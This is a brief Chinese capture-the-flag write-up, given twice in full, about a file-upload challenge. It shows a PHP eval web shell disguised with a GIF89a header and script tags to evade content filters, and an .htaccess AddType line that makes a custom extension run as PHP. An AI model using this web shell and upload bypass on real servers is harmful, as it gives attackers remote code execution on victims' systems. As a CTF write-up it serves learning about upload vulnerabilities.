是一题文件上传题目,先上传试试
过滤了php文件头,那就伪造一个
看样<?也被过滤了,所以在过滤一次
GIF89a<script language ="php"> eval($_POST['c']); </script>
用这个
结果后缀不能含有ph因此还得用别的方法
.htaccess文件绕过
AddType application/x-httpd-php .bendan
正常上传
接下来就写入shell即可
flag就出来了
是一题文件上传题目,先上传试试
过滤了php文件头,那就伪造一个
看样<?也被过滤了,所以在过滤一次
GIF89a<script language ="php"> eval($_POST['c']); </script>
用这个
结果后缀不能含有ph因此还得用别的方法
.htaccess文件绕过
AddType application/x-httpd-php .bendan
正常上传
接下来就写入shell即可
flag就出来了